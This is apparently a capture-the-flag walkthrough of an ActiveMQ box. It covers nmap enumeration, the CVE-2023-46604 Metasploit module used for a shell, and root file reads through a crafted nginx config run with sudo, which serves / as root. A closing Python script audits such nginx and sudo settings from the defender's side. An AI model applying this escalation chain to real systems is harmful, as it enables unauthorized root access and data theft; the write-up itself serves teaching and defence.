Enumeration
nmap the target machine.
...
9999/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Index of /
| http-ls: Volume /
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| - 06-Nov-2023 01:10 bin/
| - 06-Nov-2023 01:10 bin/X11/
| 963 17-Feb-2020 14:11 bin/NF
| 129576 27-Oct-2023 11:38 bin/VGAuthService
| 51632 07-Feb-2022 16:03 bin/%5B
| 35344 19-Oct-2022 14:52 bin/aa-enabled
| 35344 19-Oct-2022 14:52 bin/aa-exec
| 31248 19-Oct-2022 14:52 bin/aa-features-abi
| 14478 04-May-2023 11:14 bin/add-apt-repository
| 14712 21-Feb-2022 01:49 bin/addpart
|_
44391/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
...
The result shows the keyword ActiveMQ.
I googled "activemq exploit".
I found that it is affected by CVE-2023-46604 and that 61616 is the default port.
I also found that a Metasploit module exists for it.
So I chose Metasploit instead of using the GitHub source code.
user flag
msfconsole search activemq
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload
1 exploit/windows/http/apache_activemq_traversal_upload 2015-08-19 excellent Yes Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload
2 auxiliary/scanner/http/apache_activemq_traversal normal No Apache ActiveMQ Directory Traversal
3 auxiliary/scanner/http/apache_activemq_source_disclosure normal No Apache ActiveMQ JSP Files Source Disclosure
4 exploit/multi/misc/apache_activemq_rce_cve_2023_46604 2023-10-27 excellent Yes Apache ActiveMQ Unauthenticated Remote Code Execution
5 exploit/windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
Module 4 is the one I found. Use it, set the required parameters, and we get a shell.
whoami
activemq
The user flag is in the home directory.
root flag
To escalate to root, I checked what sudo allows for this user.
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
Ok, we can run nginx with sudo, which means we can start it with a configuration file of our own choosing.
cat /etc/nginx/nginx.conf | grep -v "#"
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
sendfile on;
tcp_nopush on;
types_hash_max_size 2048;
include /etc/nginx/mime.types;
default_type application/octet-stream;
ssl_prefer_server_ciphers on;
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
gzip on;
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
We are going to write our own version of this file to get root privileges.
I modified the file as below and saved it to activemq’s home directory as nginx.config.
user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
}
http {
server {
listen 9999;
location / {
root /;
autoindex on;
}
}
}
Basically, I changed the worker user to root, added a server on port 9999, and set the document root of location / to ‘/’ with directory listing enabled.
Then we can start nginx with the modified config file (sudo is required so that the worker really runs as root).
sudo nginx -c /home/activemq/nginx.config
Then we can curl it to check that it is working.
curl localhost:9999
...
<a href="root/">root/</a> 15-Apr-2024 00:56 -
<a href="run/">run/</a> 15-Apr-2024 05:24 -
<a href="sbin/">sbin/</a> 06-Nov-2023 01:10 -
<a href="srv/">srv/</a> 06-Nov-2023 01:18 -
<a href="sys/">sys/</a> 15-Apr-2024 00:55 -
<a href="tmp/">tmp/</a> 15-Apr-2024 05:15 -
<a href="usr/">usr/</a> 17-Feb-2023 17:19 -
<a href="var/">var/</a> 05-Nov-2023 01:43 -
</pre><hr></body>
</html>
Ok, I can see the directory listing.
Now we can read files under /root directly, as set up in the modified config file.
curl localhost:9999/root/root.txt
Then we will get the root flag.
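As an added defender-side example, not part of the original write-up, here is a small Python audit that covers the two points above: the sudo -l rule and the nginx configuration directives that turned that rule into root-level file access. The config samples and the sudo -l text are constructed copies of what the write-up shows; user, root, autoindex and dav_methods are real nginx directives, while the finding codes are my own naming.

```python
import re

# Constructed sample: the modified nginx.conf from the write-up (runs workers
# as root and serves the whole filesystem on port 9999).
MALICIOUS_CONF = """\
user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
    worker_connections 768;
}
http {
    server {
        listen 9999;
        location / {
            root /;
            autoindex on;
        }
    }
}
"""

# Constructed sample: an ordinary config serving a normal document root.
BENIGN_CONF = """\
user www-data;
events { worker_connections 768; }
http {
    server {
        listen 80;
        location / {
            root /var/www/html;  # comments must be ignored by the parser
        }
    }
}
"""

# Constructed sample: the shape of the `sudo -l` output shown in the write-up.
SUDO_L_OUTPUT = """\
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass, use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
"""

# Tokens: a block opener ("http", "location /"), "{", "}", or a "name args;" statement.
TOKEN_RE = re.compile(r"[^{};]+(?=\{)|\{|\}|[^{};]+;")


def parse_directives(text):
    """Flatten an nginx config into (context, name, args) triples.

    context is a tuple of enclosing block openers, e.g. ("http", "server", "location /").
    Comments are stripped first; quoted values are not special-cased, which is
    enough for an audit of the directives checked below.
    """
    text = re.sub(r"#[^\n]*", "", text)
    stack, directives = [], []
    for tok in TOKEN_RE.findall(text):
        tok = tok.strip()
        if tok == "{":
            continue                      # opener was pushed when its name was seen
        if tok == "}":
            stack.pop()
        elif tok.endswith(";"):
            parts = tok[:-1].split()
            directives.append((tuple(stack), parts[0], parts[1:]))
        else:
            stack.append(tok)             # block opener such as "http" or "location /"
    return directives


def audit_nginx_config(text):
    """Return (code, context) findings for the directives that made this config dangerous."""
    findings = []
    for ctx, name, args in parse_directives(text):
        where = " > ".join(ctx) or "main"
        if name == "user" and args and args[0] == "root":
            findings.append(("user_root", where))          # worker processes run as uid 0
        elif name == "root" and args and args[0] == "/":
            findings.append(("docroot_is_fs_root", where)) # whole filesystem is served
        elif name == "autoindex" and args and args[0] == "on":
            findings.append(("autoindex_on", where))       # directory listings exposed
        elif name == "dav_methods" and any(a.upper() == "PUT" for a in args):
            findings.append(("dav_put_enabled", where))    # file writes via HTTP PUT
    return findings


def nopasswd_binaries(sudo_l_output):
    """Extract the binaries granted NOPASSWD in `sudo -l` output."""
    found = []
    for line in sudo_l_output.splitlines():
        m = re.search(r"\([^)]*\)\s+NOPASSWD:\s*(.+)", line)
        if m:
            found.extend(p.strip() for p in m.group(1).split(","))
    return found


if __name__ == "__main__":
    print("sudo NOPASSWD binaries:", nopasswd_binaries(SUDO_L_OUTPUT))
    for code, where in audit_nginx_config(MALICIOUS_CONF):
        print(f"{code:20} at {where}")
```

The point the audit makes explicit: nginx accepts a caller-supplied configuration file with -c, and that file decides which user the workers run as and which paths they serve, so a NOPASSWD sudo entry for /usr/sbin/nginx is equivalent to root-level file access. The same check also flags the dav_methods PUT setting that the official write-up used for the upload variant.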
In the official write-up, they modified the config file to allow the PUT method so that files can be uploaded.
Then they generate an SSH key pair and upload the public key into root’s authorized_keys.
By doing that, you can log in as root using the corresponding private key.
However, I didn’t do that, since I could get the flag without logging in as root.